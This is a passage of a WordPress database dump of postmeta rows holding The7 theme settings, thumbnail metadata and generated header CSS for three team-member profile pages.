(27324,3688,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(27326,3691,'_wp_attached_file','2023/02/tut1.jpg'),
(27327,3691,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:71;s:6:\"height\";i:95;s:4:\"file\";s:16:\"2023/02/tut1.jpg\";s:8:\"filesize\";i:3269;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27328,3688,'_thumbnail_id','3691'),
(27329,3693,'_edit_lock','1675731547:1'),
(27330,3694,'_wp_attached_file','2023/02/tut2.jpg'),
(27331,3694,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:75;s:6:\"height\";i:95;s:4:\"file\";s:16:\"2023/02/tut2.jpg\";s:8:\"filesize\";i:3945;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27332,3693,'_thumbnail_id','3694'),
(27333,3693,'_edit_last','1'),
(27334,3693,'_dt_sidebar_position','disabled'),
(27335,3693,'_dt_sidebar_widgetarea_id','sidebar_1'),
(27336,3693,'_dt_sidebar_hide_on_mobile','0'),
(27337,3693,'_dt_footer_show','1'),
(27338,3693,'_dt_footer_widgetarea_id','sidebar_2'),
(27339,3693,'_dt_footer_hide_on_mobile','0'),
(27340,3693,'_dt_header_title','fancy'),
(27341,3693,'_dt_header_background','normal'),
(27342,3693,'_dt_header_background_below_slideshow','disabled'),
(27343,3693,'_dt_header_transparent_bg_color_scheme','light'),
(27344,3693,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(27345,3693,'_dt_header_transparent_top_bar_bg_opacity','25'),
(27346,3693,'_dt_header_transparent_bg_color','#000000'),
(27347,3693,'_dt_header_transparent_bg_opacity','50'),
(27348,3693,'_dt_header_disabled_background','normal'),
(27349,3693,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(27350,3693,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(27351,3693,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(27352,3693,'_dt_header_disabled_transparent_bg_color','#000000'),
(27353,3693,'_dt_header_disabled_transparent_bg_opacity','50'),
(27354,3693,'_dt_page_overrides_top_margin',''),
(27355,3693,'_dt_page_overrides_right_margin',''),
(27356,3693,'_dt_page_overrides_bottom_margin',''),
(27357,3693,'_dt_page_overrides_left_margin',''),
(27358,3693,'_dt_mobile_page_padding_top',''),
(27359,3693,'_dt_mobile_page_padding_right',''),
(27360,3693,'_dt_mobile_page_padding_bottom',''),
(27361,3693,'_dt_mobile_page_padding_left',''),
(27362,3693,'_dt_fancy_header_layout_heading',''),
(27363,3693,'_dt_fancy_header_title_aligment','center'),
(27364,3693,'_dt_fancy_header_height','300'),
(27365,3693,'_dt_fancy_header_padding-top','0px'),
(27366,3693,'_dt_fancy_header_padding-bottom','0px'),
(27367,3693,'_dt_fancy_header_breadcrumbs_heading',''),
(27368,3693,'_dt_fancy_header_breadcrumbs','disabled'),
(27369,3693,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(27370,3693,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(27371,3693,'_dt_fancy_header_title_heading',''),
(27372,3693,'_dt_fancy_header_title_mode','custom'),
(27373,3693,'_dt_fancy_header_title','Frank B Osei  '),
(27374,3693,'_dt_fancy_header_title_font_size','30'),
(27375,3693,'_dt_fancy_header_title_line_height','36'),
(27376,3693,'_dt_fancy_header_text_transform','none'),
(27377,3693,'_dt_fancy_header_title_color_mode','color'),
(27378,3693,'_dt_fancy_header_title_color','#ffffff'),
(27379,3693,'_dt_fancy_header_subtitle_heading',''),
(27380,3693,'_dt_fancy_header_subtitle',''),
(27381,3693,'_dt_fancy_header_subtitle_font_size','18'),
(27382,3693,'_dt_fancy_header_subtitle_line_height','26'),
(27383,3693,'_dt_fancy_header_subtitle_text_transform','none'),
(27384,3693,'_dt_fancy_header_subtitle_color_mode','color'),
(27385,3693,'_dt_fancy_header_subtitle_color','#ffffff'),
(27386,3693,'_dt_fancy_header_bg_heading',''),
(27387,3693,'_dt_fancy_header_bg_color','#222222'),
(27388,3693,'_dt_fancy_header_bg_image_origin','custom'),
(27389,3693,'_dt_fancy_header_bg_image','a:0:{}'),
(27390,3693,'_dt_fancy_header_bg_repeat','no-repeat'),
(27391,3693,'_dt_fancy_header_bg_position_x','center'),
(27392,3693,'_dt_fancy_header_bg_position_y','center'),
(27393,3693,'_dt_fancy_header_bg_fullscreen','1'),
(27394,3693,'_dt_fancy_header_bg_overlay','0'),
(27395,3693,'_dt_fancy_header_overlay_color','#000'),
(27396,3693,'_dt_fancy_header_bg_overlay_opacity','50'),
(27397,3693,'_dt_fancy_header_scroll_effect','default'),
(27398,3693,'_dt_fancy_header_bg_parallax','0.5'),
(27399,3693,'_dt_fancy_header_responsiveness_heading',''),
(27400,3693,'_dt_fancy_header_responsiveness','disabled'),
(27401,3693,'_dt_fancy_header_responsiveness_switch','778px'),
(27402,3693,'_dt_fancy_header_responsive_height','70'),
(27403,3693,'_dt_fancy_header_responsive_font_size','30'),
(27404,3693,'_dt_fancy_header_responsive_title_line_height','38'),
(27405,3693,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(27406,3693,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(27407,3693,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(27408,3693,'_dt_teammate_options_go_to_single','1'),
(27409,3693,'_dt_teammate_options_position',''),
(27410,3693,'_dt_teammate_options_website',''),
(27411,3693,'_dt_teammate_options_mail',''),
(27412,3693,'_dt_teammate_options_facebook',''),
(27413,3693,'_dt_teammate_options_twitter',''),
(27414,3693,'_dt_teammate_options_dribbble',''),
(27415,3693,'_dt_teammate_options_you-tube',''),
(27416,3693,'_dt_teammate_options_rss',''),
(27417,3693,'_dt_teammate_options_delicious',''),
(27418,3693,'_dt_teammate_options_flickr',''),
(27419,3693,'_dt_teammate_options_lastfm',''),
(27420,3693,'_dt_teammate_options_linkedin',''),
(27421,3693,'_dt_teammate_options_vimeo',''),
(27422,3693,'_dt_teammate_options_tumbler',''),
(27423,3693,'_dt_teammate_options_pinterest',''),
(27424,3693,'_dt_teammate_options_devian',''),
(27425,3693,'_dt_teammate_options_skype',''),
(27426,3693,'_dt_teammate_options_github',''),
(27427,3693,'_dt_teammate_options_instagram',''),
(27428,3693,'_dt_teammate_options_stumbleupon',''),
(27429,3693,'_dt_teammate_options_behance',''),
(27430,3693,'_dt_teammate_options_px-500',''),
(27431,3693,'_dt_teammate_options_tripedvisor',''),
(27432,3693,'_dt_teammate_options_vk',''),
(27433,3693,'_dt_teammate_options_foursquare',''),
(27434,3693,'_dt_teammate_options_xing',''),
(27435,3693,'_dt_teammate_options_weibo',''),
(27436,3693,'_dt_teammate_options_odnoklassniki',''),
(27437,3693,'_dt_teammate_options_research-gate',''),
(27438,3693,'_dt_teammate_options_yelp',''),
(27439,3693,'_dt_teammate_options_blogger',''),
(27440,3693,'_dt_teammate_options_soundcloud',''),
(27441,3693,'_dt_teammate_options_viber',''),
(27442,3693,'_dt_teammate_options_whatsapp',''),
(27443,3693,'_dt_teammate_options_reddit',''),
(27444,3693,'_dt_teammate_options_snapchat',''),
(27445,3693,'_dt_teammate_options_telegram',''),
(27446,3693,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(27448,3696,'_edit_lock','1675731892:1'),
(27449,3697,'_wp_attached_file','2023/02/tut3.jpg'),
(27450,3697,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:71;s:6:\"height\";i:79;s:4:\"file\";s:16:\"2023/02/tut3.jpg\";s:8:\"filesize\";i:3477;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27451,3696,'_thumbnail_id','3697'),
(27452,3696,'_edit_last','1'),
(27453,3696,'_dt_sidebar_position','disabled'),
(27454,3696,'_dt_sidebar_widgetarea_id','sidebar_1'),
(27455,3696,'_dt_sidebar_hide_on_mobile','0'),
(27456,3696,'_dt_footer_show','1'),
(27457,3696,'_dt_footer_widgetarea_id','sidebar_2'),
(27458,3696,'_dt_footer_hide_on_mobile','0'),
(27459,3696,'_dt_header_title','fancy'),
(27460,3696,'_dt_header_background','normal'),
(27461,3696,'_dt_header_background_below_slideshow','disabled'),
(27462,3696,'_dt_header_transparent_bg_color_scheme','light'),
(27463,3696,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(27464,3696,'_dt_header_transparent_top_bar_bg_opacity','25'),
(27465,3696,'_dt_header_transparent_bg_color','#000000'),
(27466,3696,'_dt_header_transparent_bg_opacity','50'),
(27467,3696,'_dt_header_disabled_background','normal'),
(27468,3696,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(27469,3696,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(27470,3696,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(27471,3696,'_dt_header_disabled_transparent_bg_color','#000000'),
(27472,3696,'_dt_header_disabled_transparent_bg_opacity','50'),
(27473,3696,'_dt_page_overrides_top_margin',''),
(27474,3696,'_dt_page_overrides_right_margin',''),
(27475,3696,'_dt_page_overrides_bottom_margin',''),
(27476,3696,'_dt_page_overrides_left_margin',''),
(27477,3696,'_dt_mobile_page_padding_top',''),
(27478,3696,'_dt_mobile_page_padding_right',''),
(27479,3696,'_dt_mobile_page_padding_bottom',''),
(27480,3696,'_dt_mobile_page_padding_left',''),
(27481,3696,'_dt_fancy_header_layout_heading',''),
(27482,3696,'_dt_fancy_header_title_aligment','center'),
(27483,3696,'_dt_fancy_header_height','300'),
(27484,3696,'_dt_fancy_header_padding-top','0px'),
(27485,3696,'_dt_fancy_header_padding-bottom','0px'),
(27486,3696,'_dt_fancy_header_breadcrumbs_heading',''),
(27487,3696,'_dt_fancy_header_breadcrumbs','disabled'),
(27488,3696,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(27489,3696,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(27490,3696,'_dt_fancy_header_title_heading',''),
(27491,3696,'_dt_fancy_header_title_mode','custom'),
(27492,3696,'_dt_fancy_header_title','Dilek Koç San'),
(27493,3696,'_dt_fancy_header_title_font_size','30'),
(27494,3696,'_dt_fancy_header_title_line_height','36'),
(27495,3696,'_dt_fancy_header_text_transform','none'),
(27496,3696,'_dt_fancy_header_title_color_mode','color'),
(27497,3696,'_dt_fancy_header_title_color','#ffffff'),
(27498,3696,'_dt_fancy_header_subtitle_heading',''),
(27499,3696,'_dt_fancy_header_subtitle',''),
(27500,3696,'_dt_fancy_header_subtitle_font_size','18'),
(27501,3696,'_dt_fancy_header_subtitle_line_height','26'),
(27502,3696,'_dt_fancy_header_subtitle_text_transform','none'),
(27503,3696,'_dt_fancy_header_subtitle_color_mode','color'),
(27504,3696,'_dt_fancy_header_subtitle_color','#ffffff'),
(27505,3696,'_dt_fancy_header_bg_heading',''),
(27506,3696,'_dt_fancy_header_bg_color','#222222'),
(27507,3696,'_dt_fancy_header_bg_image_origin','custom'),
(27508,3696,'_dt_fancy_header_bg_image','a:0:{}'),
(27509,3696,'_dt_fancy_header_bg_repeat','no-repeat'),
(27510,3696,'_dt_fancy_header_bg_position_x','center'),
(27511,3696,'_dt_fancy_header_bg_position_y','center'),
(27512,3696,'_dt_fancy_header_bg_fullscreen','1'),
(27513,3696,'_dt_fancy_header_bg_overlay','0'),
(27514,3696,'_dt_fancy_header_overlay_color','#000'),
(27515,3696,'_dt_fancy_header_bg_overlay_opacity','50'),
(27516,3696,'_dt_fancy_header_scroll_effect','default'),
(27517,3696,'_dt_fancy_header_bg_parallax','0.5'),
(27518,3696,'_dt_fancy_header_responsiveness_heading',''),
(27519,3696,'_dt_fancy_header_responsiveness','disabled'),
(27520,3696,'_dt_fancy_header_responsiveness_switch','778px'),
(27521,3696,'_dt_fancy_header_responsive_height','70'),
(27522,3696,'_dt_fancy_header_responsive_font_size','30'),
(27523,3696,'_dt_fancy_header_responsive_title_line_height','38'),
(27524,3696,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(27525,3696,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(27526,3696,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(27527,3696,'_dt_teammate_options_go_to_single','1'),
(27528,3696,'_dt_teammate_options_position',''),
(27529,3696,'_dt_teammate_options_website',''),
(27530,3696,'_dt_teammate_options_mail',''),
(27531,3696,'_dt_teammate_options_facebook',''),
(27532,3696,'_dt_teammate_options_twitter',''),
(27533,3696,'_dt_teammate_options_dribbble',''),
(27534,3696,'_dt_teammate_options_you-tube',''),
(27535,3696,'_dt_teammate_options_rss',''),
(27536,3696,'_dt_teammate_options_delicious',''),
(27537,3696,'_dt_teammate_options_flickr',''),
(27538,3696,'_dt_teammate_options_lastfm',''),
(27539,3696,'_dt_teammate_options_linkedin',''),
(27540,3696,'_dt_teammate_options_vimeo',''),
(27541,3696,'_dt_teammate_options_tumbler',''),
(27542,3696,'_dt_teammate_options_pinterest',''),
(27543,3696,'_dt_teammate_options_devian',''),
(27544,3696,'_dt_teammate_options_skype',''),
(27545,3696,'_dt_teammate_options_github',''),
(27546,3696,'_dt_teammate_options_instagram',''),
(27547,3696,'_dt_teammate_options_stumbleupon',''),
(27548,3696,'_dt_teammate_options_behance',''),
(27549,3696,'_dt_teammate_options_px-500',''),
(27550,3696,'_dt_teammate_options_tripedvisor',''),
(27551,3696,'_dt_teammate_options_vk',''),
(27552,3696,'_dt_teammate_options_foursquare',''),
(27553,3696,'_dt_teammate_options_xing',''),
(27554,3696,'_dt_teammate_options_weibo',''),
(27555,3696,'_dt_teammate_options_odnoklassniki',''),
(27556,3696,'_dt_teammate_options_research-gate',''),
(27557,3696,'_dt_teammate_options_yelp',''),
(27558,3696,'_dt_teammate_options_blogger',''),
(27559,3696,'_dt_teammate_options_soundcloud',''),
(27560,3696,'_dt_teammate_options_viber',''),
(27561,3696,'_dt_teammate_options_whatsapp',''),
(27562,3696,'_dt_teammate_options_reddit',''),
(27563,3696,'_dt_teammate_options_snapchat',''),
(27564,3696,'_dt_teammate_options_telegram',''),
(27565,3696,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(27566,3698,'_edit_lock','1675732265:1'),
(27567,3699,'_wp_attached_file','2023/02/tut4.jpg'),
(27568,3699,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:74;s:6:\"height\";i:82;s:4:\"file\";s:16:\"2023/02/tut4.jpg\";s:8:\"filesize\";i:3833;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27569,3698,'_thumbnail_id','3699'),
(27570,3698,'_edit_last','1'),
(27571,3698,'_dt_sidebar_position','disabled'),
(27572,3698,'_dt_sidebar_widgetarea_id','sidebar_1'),
(27573,3698,'_dt_sidebar_hide_on_mobile','0'),
(27574,3698,'_dt_footer_show','1'),
(27575,3698,'_dt_footer_widgetarea_id','sidebar_2'),
(27576,3698,'_dt_footer_hide_on_mobile','0'),
(27577,3698,'_dt_header_title','fancy'),
(27578,3698,'_dt_header_background','normal'),
(27579,3698,'_dt_header_background_below_slideshow','disabled'),
(27580,3698,'_dt_header_transparent_bg_color_scheme','light'),
(27581,3698,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(27582,3698,'_dt_header_transparent_top_bar_bg_opacity','25'),
(27583,3698,'_dt_header_transparent_bg_color','#000000'),
(27584,3698,'_dt_header_transparent_bg_opacity','50'),
(27585,3698,'_dt_header_disabled_background','normal'),
(27586,3698,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(27587,3698,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(27588,3698,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(27589,3698,'_dt_header_disabled_transparent_bg_color','#000000'),
(27590,3698,'_dt_header_disabled_transparent_bg_opacity','50'),
(27591,3698,'_dt_page_overrides_top_margin',''),
(27592,3698,'_dt_page_overrides_right_margin',''),
(27593,3698,'_dt_page_overrides_bottom_margin',''),
(27594,3698,'_dt_page_overrides_left_margin',''),
(27595,3698,'_dt_mobile_page_padding_top',''),
(27596,3698,'_dt_mobile_page_padding_right',''),
(27597,3698,'_dt_mobile_page_padding_bottom',''),
(27598,3698,'_dt_mobile_page_padding_left',''),
(27599,3698,'_dt_teammate_options_go_to_single','1'),
(27600,3698,'_dt_teammate_options_position',''),
(27601,3698,'_dt_teammate_options_website',''),
(27602,3698,'_dt_teammate_options_mail',''),
(27603,3698,'_dt_teammate_options_facebook',''),
(27604,3698,'_dt_teammate_options_twitter',''),
(27605,3698,'_dt_teammate_options_dribbble',''),
(27606,3698,'_dt_teammate_options_you-tube',''),
(27607,3698,'_dt_teammate_options_rss',''),
(27608,3698,'_dt_teammate_options_delicious',''),
(27609,3698,'_dt_teammate_options_flickr',''),
(27610,3698,'_dt_teammate_options_lastfm',''),
(27611,3698,'_dt_teammate_options_linkedin',''),
(27612,3698,'_dt_teammate_options_vimeo',''),
(27613,3698,'_dt_teammate_options_tumbler',''),
(27614,3698,'_dt_teammate_options_pinterest',''),
(27615,3698,'_dt_teammate_options_devian',''),
(27616,3698,'_dt_teammate_options_skype',''),
(27617,3698,'_dt_teammate_options_github',''),
(27618,3698,'_dt_teammate_options_instagram',''),
(27619,3698,'_dt_teammate_options_stumbleupon',''),
(27620,3698,'_dt_teammate_options_behance',''),
(27621,3698,'_dt_teammate_options_px-500',''),
(27622,3698,'_dt_teammate_options_tripedvisor',''),
(27623,3698,'_dt_teammate_options_vk',''),
(27624,3698,'_dt_teammate_options_foursquare',''),
(27625,3698,'_dt_teammate_options_xing',''),
(27626,3698,'_dt_teammate_options_weibo',''),
(27627,3698,'_dt_teammate_options_odnoklassniki',''),
(27628,3698,'_dt_teammate_options_research-gate',''),
(27629,3698,'_dt_teammate_options_yelp',''),
(27630,3698,'_dt_teammate_options_blogger',''),
(27631,3698,'_dt_teammate_options_soundcloud',''),
(27632,3698,'_dt_teammate_options_viber',''),
(27633,3698,'_dt_teammate_options_whatsapp',''),
(27634,3698,'_dt_teammate_options_reddit',''),
(27635,3698,'_dt_teammate_options_snapchat',''),
(27636,3698,'_dt_teammate_options_telegram',''),
(27637,3698,'_dt_fancy_header_layout_heading',''),
(27638,3698,'_dt_fancy_header_title_aligment','center'),
(27639,3698,'_dt_fancy_header_height','300'),
(27640,3698,'_dt_fancy_header_padding-top','0px'),
(27641,3698,'_dt_fancy_header_padding-bottom','0px'),
(27642,3698,'_dt_fancy_header_breadcrumbs_heading',''),
(27643,3698,'_dt_fancy_header_breadcrumbs','disabled'),
(27644,3698,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(27645,3698,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(27646,3698,'_dt_fancy_header_title_heading',''),
(27647,3698,'_dt_fancy_header_title_mode','custom'),
(27648,3698,'_dt_fancy_header_title','Priyanka Singh'),
(27649,3698,'_dt_fancy_header_title_font_size','30'),
(27650,3698,'_dt_fancy_header_title_line_height','36'),
(27651,3698,'_dt_fancy_header_text_transform','none'),
(27652,3698,'_dt_fancy_header_title_color_mode','color'),
(27653,3698,'_dt_fancy_header_title_color','#ffffff'),
(27654,3698,'_dt_fancy_header_subtitle_heading',''),
(27655,3698,'_dt_fancy_header_subtitle',''),
(27656,3698,'_dt_fancy_header_subtitle_font_size','18'),
(27657,3698,'_dt_fancy_header_subtitle_line_height','26'),
(27658,3698,'_dt_fancy_header_subtitle_text_transform','none'),
(27659,3698,'_dt_fancy_header_subtitle_color_mode','color'),
(27660,3698,'_dt_fancy_header_subtitle_color','#ffffff'),
(27661,3698,'_dt_fancy_header_bg_heading',''),
(27662,3698,'_dt_fancy_header_bg_color','#222222'),
(27663,3698,'_dt_fancy_header_bg_image_origin','custom'),
(27664,3698,'_dt_fancy_header_bg_image','a:0:{}'),
(27665,3698,'_dt_fancy_header_bg_repeat','no-repeat'),
(27666,3698,'_dt_fancy_header_bg_position_x','center'),
(27667,3698,'_dt_fancy_header_bg_position_y','center'),
(27668,3698,'_dt_fancy_header_bg_fullscreen','1'),
(27669,3698,'_dt_fancy_header_bg_overlay','0'),
(27670,3698,'_dt_fancy_header_overlay_color','#000'),
(27671,3698,'_dt_fancy_header_bg_overlay_opacity','50'),
(27672,3698,'_dt_fancy_header_scroll_effect','default'),
(27673,3698,'_dt_fancy_header_bg_parallax','0.5'),
(27674,3698,'_dt_fancy_header_responsiveness_heading',''),
(27675,3698,'_dt_fancy_header_responsiveness','disabled'),
(27676,3698,'_dt_fancy_header_responsiveness_switch','778px'),
(27677,3698,'_dt_fancy_header_responsive_height','70'),
(27678,3698,'_dt_fancy_header_responsive_font_size','30'),
(27679,3698,'_dt_fancy_header_responsive_title_line_height','38'),
(27680,3698,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(27681,3698,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(27682,3698,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(27683,3698,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: 